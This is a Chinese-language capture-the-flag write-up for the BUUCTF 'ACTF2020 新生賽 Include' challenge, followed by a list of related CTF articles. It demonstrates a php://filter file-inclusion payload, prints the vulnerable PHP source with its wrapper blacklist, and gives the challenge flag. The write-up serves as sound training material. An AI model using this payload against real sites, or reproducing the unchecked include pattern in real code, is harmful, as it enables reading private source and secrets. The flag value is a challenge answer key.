BUUCTF[ACTF2020 新生賽]Include
[ACTF2020 新生賽]Include
有一個tips標籤,指向的是?file=flag.php
看到?file,應該首先想到的是檔案包含
先讀取原始碼,構造payload
http://8cf4eecb-8bfa-4e2b-8616-b609fa0e7d3f.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php
發現了一串base64,解碼得到
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<a href="?file=flag.php">tips</a>';
}
?>
發現它過濾了幾個函式,但是沒有過濾filter,因此我們可以用這個來讀取flag.php
http://8cf4eecb-8bfa-4e2b-8616-b609fa0e7d3f.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php
解碼得到flag
flag{d0b7e40d-0f8a-4a70-b833-32fd243e90cb}
相關文章
- BUUCTF [ACTF2020 新生賽]IncludeTF2
- [ACTF2020 新生賽]IncludeTF2
- [ACTF2020 新生賽]BackupFileTF2
- [ACTF2020 新生賽]ExecTF2
- [ACTF2020 新生賽]UploadTF2
- [ACTF2020 新生賽]BackupFile 1TF2
- BUUCTF-Include(Web)Web
- 新生賽10
- 新生賽及預選賽 10
- NSSCTF2024新生賽TF2
- [ACTF新生賽2020]rome
- [SWPUCTF 2021 新生賽]finalrc
- [SWPUCTF 2021 新生賽]easyrce
- Nssctf [SWPUCTF 2021 新生賽]errorError
- NSSCTF [SWPUCTF 2021 新生賽]hardrce
- bupt 2024 新生賽題解
- Tron_CTF2024新生賽 MISCTF2
- [SWPUCTF 2021 新生賽]easy_sqlSQL
- Tron_CTF2024新生賽 WEBTF2Web
- NSSCTF [SWPUCTF 2021 新生賽]easyupload3.0
- [SWPUCTF 2021 新生賽]gift_F12
- [SWPUCTF 2021 新生賽]easy_md5
- 2024base新生賽week4pwn——ezstack
- ZZJC新生訓練賽第七場題解
- ZZJC新生訓練賽第九場題解
- ZZJC新生訓練賽第二場題解
- zzulioj新生周賽(6) 2733: 鍵盤霸主hrs
- include "head_file" 和 include <head_file>
- ZZJC新生訓練賽第十八場題解
- Writeup-北郵新生賽MRCTF-Misc題:ezmisc
- 湖南大學2020屆ACM新生賽 部分題解ACM
- #include的作用
- Datapump:EXCLUDE/INCLUDE
- #include <> ““區別
- 【BUUCTF】BabySQliSQL
- 【BUUCTF】AreUSerialz
- 【BUUCTF】HardSQLSQL
- BUUCTF xor